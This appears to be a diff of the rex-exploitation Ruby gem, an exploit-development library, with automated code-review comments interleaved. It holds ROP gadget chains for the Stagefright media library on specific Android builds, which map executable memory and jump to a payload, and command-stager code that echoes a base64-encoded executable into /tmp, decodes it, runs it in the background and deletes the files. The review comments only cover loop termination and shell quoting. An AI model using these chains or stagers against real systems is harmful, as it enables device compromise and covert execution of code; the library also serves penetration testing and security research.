rex-exploitation 0.1.0
- checksums.yaml +7 -0
- checksums.yaml.gz.sig +0 -0
- data.tar.gz.sig +1 -0
- data/.gitignore +9 -0
- data/.rspec +2 -0
- data/.travis.yml +5 -0
- data/CODE_OF_CONDUCT.md +74 -0
- data/Gemfile +4 -0
- data/README.md +33 -0
- data/Rakefile +6 -0
- data/bin/console +14 -0
- data/bin/setup +8 -0
- data/data/exploits/cmdstager/debug_asm +91 -0
- data/data/exploits/cmdstager/debug_write +819 -0
- data/data/exploits/cmdstager/vbs_b64 +40 -0
- data/data/exploits/cmdstager/vbs_b64_adodb +50 -0
- data/data/exploits/cmdstager/vbs_b64_noquot +49 -0
- data/data/exploits/cmdstager/vbs_b64_sleep +41 -0
- data/data/js/detect/ie_addons.js +89 -0
- data/data/js/detect/misc_addons.js +157 -0
- data/data/js/detect/os.js +831 -0
- data/data/js/memory/explib2/lib/explib2.js +426 -0
- data/data/js/memory/explib2/payload/drop_exec.js +33 -0
- data/data/js/memory/explib2/payload/exec.js +10 -0
- data/data/js/memory/heap_spray.js +17 -0
- data/data/js/memory/heaplib2.js +192 -0
- data/data/js/memory/mstime_malloc.js +31 -0
- data/data/js/memory/property_spray.js +38 -0
- data/data/js/network/ajax_download.js +18 -0
- data/data/js/network/ajax_post.js +18 -0
- data/data/js/network/xhr_shim.js +15 -0
- data/data/js/utils/base64.js +126 -0
- data/data/ropdb/flash.xml +80 -0
- data/data/ropdb/hxds.xml +66 -0
- data/data/ropdb/java.xml +33 -0
- data/data/ropdb/msvcrt.xml +71 -0
- data/data/ropdb/reader.xml +132 -0
- data/data/ropdb/samba.xml +436 -0
- data/data/ropdb/stagefright.xml +225 -0
- data/lib/rex/exploitation.rb +7 -0
- data/lib/rex/exploitation/cmdstager.rb +11 -0
- data/lib/rex/exploitation/cmdstager/base.rb +189 -0
- data/lib/rex/exploitation/cmdstager/bourne.rb +118 -0
- data/lib/rex/exploitation/cmdstager/certutil.rb +114 -0
- data/lib/rex/exploitation/cmdstager/debug_asm.rb +139 -0
- data/lib/rex/exploitation/cmdstager/debug_write.rb +133 -0
- data/lib/rex/exploitation/cmdstager/echo.rb +166 -0
- data/lib/rex/exploitation/cmdstager/printf.rb +121 -0
- data/lib/rex/exploitation/cmdstager/tftp.rb +70 -0
- data/lib/rex/exploitation/cmdstager/vbs.rb +125 -0
- data/lib/rex/exploitation/egghunter.rb +423 -0
- data/lib/rex/exploitation/encryptjs.rb +79 -0
- data/lib/rex/exploitation/heaplib.js.b64 +331 -0
- data/lib/rex/exploitation/heaplib.rb +107 -0
- data/lib/rex/exploitation/js.rb +6 -0
- data/lib/rex/exploitation/js/detect.rb +70 -0
- data/lib/rex/exploitation/js/memory.rb +80 -0
- data/lib/rex/exploitation/js/network.rb +83 -0
- data/lib/rex/exploitation/js/utils.rb +32 -0
- data/lib/rex/exploitation/jsobfu.rb +17 -0
- data/lib/rex/exploitation/obfuscatejs.rb +336 -0
- data/lib/rex/exploitation/omelet.rb +321 -0
- data/lib/rex/exploitation/opcodedb.rb +819 -0
- data/lib/rex/exploitation/ropdb.rb +190 -0
- data/lib/rex/exploitation/seh.rb +93 -0
- data/lib/rex/exploitation/version.rb +5 -0
- data/rex-exploitation.gemspec +35 -0
- metadata +298 -0
- metadata.gz.sig +0 -0
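--- a/data/data/ropdb/stagefright.xml
+++ b/data/data/ropdb/stagefright.xml
@@ -0,0 +1,225 @@
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<db>
+<rop>
+<compatibility>
+<target>lrx</target>
+</compatibility>
+
+<gadgets base="0xb66a0000">
+<gadget value="junk">value to be skipped (r3)</gadget>
+<gadget value="junk">value to be skipped (r4)</gadget>
+<gadget offset="0x000042f9">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
+<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
+<gadget value="0x00001000">mmap64 length (1 page)</gadget>
+<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
+<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
+<gadget offset="0x001127b8">ptr to mmap64 (less 0x20)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x0008b7d9">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
+<gadget value="0xffffffff">mmap64 fd</gadget>
+<gadget value="0x00000000">mmap64 fd</gadget>
+<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
+<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x00058e63">pop {r4, pc}</gadget>
+<gadget offset="0x00110438">ptr to memcpy (less 0x20)</gadget>
+<gadget offset="0x00061597">pop {r1, r2, r7, pc}</gadget>
+<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
+<gadget value="size">memcpy length (payload size)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x0008b7d9">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
+<gadget value="junk">value to be skipped (r3)</gadget>
+<gadget value="junk">value to be skipped (r4)</gadget>
+<gadget value="junk">value to be skipped (r5)</gadget>
+<gadget value="junk">value to be skipped (r6)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x0002fed3">bx r0</gadget>
+</gadgets>
+</rop>
+
+<rop>
+<compatibility>
+<target>lmy-1</target>
+</compatibility>
+
+<gadgets base="0xb66a0000">
+<gadget value="junk">value to be skipped (r3)</gadget>
+<gadget value="junk">value to be skipped (r4)</gadget>
+<gadget offset="0x000bfdbf">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
+<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
+<gadget value="0x00001000">mmap64 length (1 page)</gadget>
+<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
+<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
+<gadget offset="0x001137b4">ptr to mmap64 (less 0x20)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x0008c269">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
+<gadget value="0xffffffff">mmap64 fd</gadget>
+<gadget value="0x00000000">mmap64 fd</gadget>
+<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
+<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x0000f379">pop {r4, pc}</gadget>
+<gadget offset="0x00111430">ptr to memcpy (less 0x20)</gadget>
+<gadget offset="0x000a1251">pop {r1, r2, r7, pc}</gadget>
+<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
+<gadget value="size">memcpy length (payload size)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x0008c269">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
+<gadget value="junk">value to be skipped (r3)</gadget>
+<gadget value="junk">value to be skipped (r4)</gadget>
+<gadget value="junk">value to be skipped (r5)</gadget>
+<gadget value="junk">value to be skipped (r6)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x000301a5">bx r0</gadget>
+</gadgets>
+</rop>
+
+<rop>
+<compatibility>
+<target>lmy-2</target>
+</compatibility>
+
+<gadgets base="0xb66a0000">
+<gadget value="junk">value to be skipped (r3)</gadget>
+<gadget value="junk">value to be skipped (r4)</gadget>
+<gadget offset="0x000bfe07">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
+<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
+<gadget value="0x00001000">mmap64 length (1 page)</gadget>
+<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
+<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
+<gadget offset="0x001137b4">ptr to mmap64 (less 0x20)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x0008c231">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
+<gadget value="0xffffffff">mmap64 fd</gadget>
+<gadget value="0x00000000">mmap64 fd</gadget>
+<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
+<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x0000f379">pop {r4, pc}</gadget>
+<gadget offset="0x00111430">ptr to memcpy (less 0x20)</gadget>
+<gadget offset="0x000042e9">pop {r1, r2, r6, pc}</gadget>
+<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
+<gadget value="size">memcpy length (payload size)</gadget>
+<gadget value="junk">value to be skipped (r6)</gadget>
+<gadget offset="0x0008c231">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
+<gadget value="junk">value to be skipped (r3)</gadget>
+<gadget value="junk">value to be skipped (r4)</gadget>
+<gadget value="junk">value to be skipped (r5)</gadget>
+<gadget value="junk">value to be skipped (r6)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x0000b3bd">bx r0</gadget>
+</gadgets>
+</rop>
+
+<rop>
+<compatibility>
+<target>shamu / LYZ28E</target>
+</compatibility>
+
+<gadgets base="0xb66a0000">
+<gadget value="junk">value to be skipped (r3)</gadget>
+<gadget value="junk">value to be skipped (r4)</gadget>
+<gadget offset="0x000bfe4f">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
+<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
+<gadget value="0x00001000">mmap64 length (1 page)</gadget>
+<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
+<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
+<gadget offset="0x0011e7b0">ptr to mmap64 (less 0x20)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x0008c279">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
+<gadget value="0xffffffff">mmap64 fd</gadget>
+<gadget value="0x00000000">mmap64 fd</gadget>
+<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
+<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x00044f71">pop {r4, pc}</gadget>
+<gadget offset="0x0011c42c">ptr to memcpy (less 0x20)</gadget>
+<gadget offset="0x000042e9">pop {r1, r2, r6, pc}</gadget>
+<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
+<gadget value="size">memcpy length (payload size)</gadget>
+<gadget value="junk">value to be skipped (r6)</gadget>
+<gadget offset="0x0008c279">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
+<gadget value="junk">value to be skipped (r3)</gadget>
+<gadget value="junk">value to be skipped (r4)</gadget>
+<gadget value="junk">value to be skipped (r5)</gadget>
+<gadget value="junk">value to be skipped (r6)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x0000f7cd">bx r0</gadget>
+</gadgets>
+</rop>
+
+<rop>
+<compatibility>
+<target>shamu / LYZ28J</target>
+</compatibility>
+
+<gadgets base="0xb66a0000">
+<gadget value="junk">value to be skipped (r3)</gadget>
+<gadget value="junk">value to be skipped (r4)</gadget>
+<gadget offset="0x000bfe07">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
+<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
+<gadget value="0x00001000">mmap64 length (1 page)</gadget>
+<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
+<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
+<gadget offset="0x0011e7b0">ptr to mmap64 (less 0x20)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x0008c231">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
+<gadget value="0xffffffff">mmap64 fd</gadget>
+<gadget value="0x00000000">mmap64 fd</gadget>
+<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
+<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x00044f71">pop {r4, pc}</gadget>
+<gadget offset="0x0011c42c">ptr to memcpy (less 0x20)</gadget>
+<gadget offset="0x000042e9">pop {r1, r2, r6, pc}</gadget>
+<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
+<gadget value="size">memcpy length (payload size)</gadget>
+<gadget value="junk">value to be skipped (r6)</gadget>
+<gadget offset="0x0008c231">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
+<gadget value="junk">value to be skipped (r3)</gadget>
+<gadget value="junk">value to be skipped (r4)</gadget>
+<gadget value="junk">value to be skipped (r5)</gadget>
+<gadget value="junk">value to be skipped (r6)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x0000f83d">bx r0</gadget>
+</gadgets>
+</rop>
+
+<rop>
+<compatibility>
+<target>sm-g900v / OE1</target>
+</compatibility>
+
+<gadgets base="0xb66a0000">
+<gadget value="junk">value to be skipped (r3)</gadget>
+<gadget value="junk">value to be skipped (r4)</gadget>
+<gadget offset="0x00092b85">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
+<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
+<gadget value="0x00001000">mmap64 length (1 page)</gadget>
+<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
+<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
+<gadget offset="0x0017af08">ptr to mmap64 (less 0x20)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x000a7a41">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
+<gadget value="0xffffffff">mmap64 fd</gadget>
+<gadget value="0x00000000">mmap64 fd</gadget>
+<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
+<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x00065467">pop {r4, pc}</gadget>
+<gadget offset="0x0017a6e4">ptr to memcpy (less 0x20)</gadget>
+<gadget offset="0x0009f359">pop {r1, r2, r7, pc}</gadget>
+<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
+<gadget value="size">memcpy length (payload size)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x000a7a41">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
+<gadget value="junk">value to be skipped (r3)</gadget>
+<gadget value="junk">value to be skipped (r4)</gadget>
+<gadget value="junk">value to be skipped (r5)</gadget>
+<gadget value="junk">value to be skipped (r6)</gadget>
+<gadget value="junk">value to be skipped (r7)</gadget>
+<gadget offset="0x0000c409">bx r0</gadget>
+</gadgets>
+</rop>
+
+</db>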
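--- a/data/lib/rex/exploitation/cmdstager.rb
+++ b/data/lib/rex/exploitation/cmdstager.rb
@@ -0,0 +1,11 @@
+# -*- coding: binary -*-
+
+require 'rex/exploitation/cmdstager/base'
+require 'rex/exploitation/cmdstager/vbs'
+require 'rex/exploitation/cmdstager/certutil'
+require 'rex/exploitation/cmdstager/debug_write'
+require 'rex/exploitation/cmdstager/debug_asm'
+require 'rex/exploitation/cmdstager/tftp'
+require 'rex/exploitation/cmdstager/bourne'
+require 'rex/exploitation/cmdstager/echo'
+require 'rex/exploitation/cmdstager/printf'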
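--- a/data/lib/rex/exploitation/cmdstager/base.rb
+++ b/data/lib/rex/exploitation/cmdstager/base.rb
@@ -0,0 +1,189 @@
+# -*- coding: binary -*-
+require 'rex/text'
+require 'rex/arch'
+
+module Rex
+module Exploitation
+
+###
+#
+# This class provides an interface to generating cmdstagers.
+#
+###
+
+class CmdStagerBase
+
+def initialize(exe)
+@linemax = 2047 # covers most likely cases
+@exe = exe
+end
+
+#
+# Generates the cmd payload including the h2bv2 decoder and encoded payload.
+# The resulting commands also perform cleanup, removing any left over files
+#
+def generate(opts = {})
+# Allow temporary directory override
+@tempdir = opts[:temp]
+@tempdir ||= "%TEMP%\\"
+if (@tempdir == '.')
+@tempdir = ''
+end
+
+opts[:linemax] ||= @linemax
+
+generate_cmds(opts)
+end
+
+
+#
+# This does the work of actually building an array of commands that
+# when executed will create and run an executable payload.
+#
+def generate_cmds(opts)
+
+# Initialize an arry of commands to execute
+cmds = []
+
+# Add the exe building commands
+cmds += generate_cmds_payload(opts)
+
+# Add the decoder script building commands
+cmds += generate_cmds_decoder(opts)
+
+compress_commands(cmds, opts)
+end
+
+
+#
+# Generate the commands to create an encoded version of the
+# payload file
+#
+def generate_cmds_payload(opts)
+
+# First encode the payload
+encoded = encode_payload(opts)
+
+# Now split it up into usable pieces
+parts = slice_up_payload(encoded, opts)
+
+# Turn each part into a valid command
+parts_to_commands(parts, opts)
+end
+
+#
+# This method is intended to be override by the child class
+#
+def encode_payload(opts)
+# Defaults to nothing
+""
+end
+
+#
+# We take a string of data and turn it into an array of parts.
+#
+# We save opts[:extra] bytes out of every opts[:linemax] for the parts
+# appended and prepended to the resulting elements.
+#
+def slice_up_payload(encoded, opts)
+tmp = encoded.dup
+
+parts = []
+xtra_len = opts[:extra]
+xtra_len ||= 0
+while (tmp.length > 0)
+parts << tmp.slice!(0, (opts[:linemax] - xtra_len))
+end
+
+parts
+end
+
+#
+# Combine the parts of the encoded file with the stuff that goes
+# before / after it -- example "echo " and " >>file"
+#
+def parts_to_commands(parts, opts)
+# Return as-is
+parts
+end
+
+
+
+#
+# Generate the commands that will decode the file we just created
+#
+def generate_cmds_decoder(opts)
+# Defaults to no commands.
+[]
+end
+
+
+
+#
+# Compress commands into as few lines as possible. Minimizes the number of
+# commands to execute while maximizing the number of commands per execution.
+#
+def compress_commands(cmds, opts)
+new_cmds = []
+line = ''
+
+concat = opts[:concat_operator] || cmd_concat_operator
+
+# We cannot compress commands if there is no way to combine commands on
+# a single line.
+return cmds unless concat
+
+cmds.each { |cmd|
+
+# If this command will fit, concat it and move on.
+if ((line.length + cmd.length + concat.length) < opts[:linemax])
+line << concat if line.length > 0
+line << cmd
+next
+end
+
+# The command wont fit concat'd to this line, if we have something,
+# we have to add it to the array now.
+if (line.length > 0)
+new_cmds << line
+line = ''
+end
+
+# If it won't fit even after emptying the current line, error out..
+if (cmd.length > opts[:linemax])
+raise RuntimeError, 'Line too long - %u bytes, max %u' % [cmd.length, opts[:linemax]]
+end
+
+# It will indeed fit by itself, lets add it.
+line << cmd
+
+}
+new_cmds << line if (line.length > 0)
+
+# Return the final array.
+new_cmds
+end
+
+#
+# Can be overriden. For exmaple, use for unix use ";" instead
+#
+def cmd_concat_operator
+nil
+end
+
+# Should be overriden if the cmd stager needs to setup anything
+# before it's executed
+def setup(mod = nil)
+
+end
+
+#
+# Should be overriden if the cmd stager needs to do any clenaup
+#
+def teardown(mod = nil)
+
+end
+
+end
+end
+end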
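Review bot: `slice_up_payload` never terminates when `opts[:linemax] - xtra_len` is zero or negative, because `String#slice!` with a non-positive length returns `""` or `nil` without shrinking `tmp`, so `while (tmp.length > 0)` spins forever (a caller passing a small `:linemax`, or a subclass whose `:extra` reaches `:linemax`, hits this). Compute the chunk once and guard it before the loop: `chunk = opts[:linemax] - xtra_len` and `raise ArgumentError, "linemax #{opts[:linemax]} leaves no room for #{xtra_len} extra bytes" if chunk <= 0`, then slice with `chunk`. `compress_commands` also uses two different bounds: a concatenation is accepted only when the total is strictly `< opts[:linemax]`, while a lone command is rejected only when `> opts[:linemax]`, so the limit is off by one between the two paths and should be a single comparison. The header comments carry typos worth fixing while here (`arry`, `override by`, `overriden`, `exmaple`, `clenaup`).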
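--- a/data/lib/rex/exploitation/cmdstager/bourne.rb
+++ b/data/lib/rex/exploitation/cmdstager/bourne.rb
@@ -0,0 +1,118 @@
+# -*- coding: binary -*-
+
+require 'rex/text'
+require 'rex/arch'
+
+module Rex
+module Exploitation
+
+class CmdStagerBourne < CmdStagerBase
+
+def initialize(exe)
+super
+
+@var_encoded = Rex::Text.rand_text_alpha(5) + '.b64'
+@var_decoded = Rex::Text.rand_text_alpha(5)
+end
+
+def generate(opts = {})
+opts[:temp] = opts[:temp] || '/tmp/'
+opts[:temp] = opts[:temp].empty?? opts[:temp] : opts[:temp] + '/'
+opts[:temp] = opts[:temp].gsub(/\/{2,}/, '/')
+opts[:temp] = opts[:temp].gsub(/'/, "\\\\'")
+opts[:temp] = opts[:temp].gsub(/ /, "\\ ")
+if (opts[:file])
+@var_encoded = opts[:file] + '.b64'
+@var_decoded = opts[:file]
+end
+super
+end
+
+#
+# Override just to set the extra byte count
+#
+def generate_cmds(opts)
+# Set the start/end of the commands here (vs initialize) so we have @tempdir
+@cmd_start = "echo -n "
+@cmd_end = ">>'#{@tempdir}#{@var_encoded}'"
+xtra_len = @cmd_start.length + @cmd_end.length + 1
+opts.merge!({ :extra => xtra_len })
+super
+end
+
+
+#
+# Simple base64...
+#
+def encode_payload(opts)
+Rex::Text.encode_base64(@exe)
+end
+
+
+#
+# Combine the parts of the encoded file with the stuff that goes
+# before / after it.
+#
+def parts_to_commands(parts, opts)
+
+cmds = []
+parts.each do |p|
+cmd = ''
+cmd << @cmd_start
+cmd << p
+cmd << @cmd_end
+cmds << cmd
+end
+
+cmds
+end
+
+#
+# Generate the commands that will decode the file we just created
+#
+def generate_cmds_decoder(opts)
+decoders = [
+"base64 --decode -",
+"openssl enc -d -A -base64 -in /dev/stdin",
+"python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());'",
+"perl -MMIME::Base64 -ne 'print decode_base64($_)'"
+]
+decoder_cmd = []
+decoders.each do |cmd|
+binary = cmd.split(' ')[0]
+decoder_cmd << "(which #{binary} >&2 && #{cmd})"
+end
+decoder_cmd = decoder_cmd.join(" || ")
+decoder_cmd = "(" << decoder_cmd << ") 2> /dev/null > '#{@tempdir}#{@var_decoded}' < '#{@tempdir}#{@var_encoded}'"
+[ decoder_cmd ]
+end
+
+def compress_commands(cmds, opts)
+# Make it all happen
+cmds << "chmod +x '#{@tempdir}#{@var_decoded}'"
+# Background the process, allowing the cleanup code to continue and delete the data
+# while allowing the original shell to continue to function since it isn't waiting
+# on the payload to exit. The 'sleep' is required as '&' is a command terminator
+# and having & and the cmds delimiter ';' next to each other is invalid.
+if opts[:background]
+cmds << "'#{@tempdir}#{@var_decoded}' & sleep 2"
+else
+cmds << "'#{@tempdir}#{@var_decoded}'"
+end
+
+# Clean up after unless requested not to..
+if (not opts[:nodelete])
+cmds << "rm -f '#{@tempdir}#{@var_decoded}'"
+cmds << "rm -f '#{@tempdir}#{@var_encoded}'"
+end
+
+super
+end
+
+def cmd_concat_operator
+" ; "
+end
+
+end
+end
+end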
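Review bot: the single-quote escaping in `generate` (`opts[:temp].gsub(/'/, "\\\\'")`) does not protect anything, because `@tempdir` is later interpolated inside single-quoted shell words (`>>'#{@tempdir}#{@var_encoded}'` in `generate_cmds`, and the `chmod`/`rm`/exec lines in `compress_commands`), where a backslash is literal and a `'` simply terminates the word; `opts[:file]` gets no treatment at all before it becomes `@var_decoded` and `@var_encoded`. The robust options are to reject such input up front — e.g. `raise ArgumentError, 'invalid :file' unless opts[:file].nil? || opts[:file] =~ %r{\A[\w./-]+\z}` with the same check applied to `opts[:temp]` — or to quote with the standard `'\''` idiom; the current `gsub` pair only gives a false sense of safety and should go either way. Line 20's `opts[:temp].empty?? opts[:temp] : opts[:temp] + '/'` is also hard to read; `opts[:temp] += '/' unless opts[:temp].empty?` expresses the same thing.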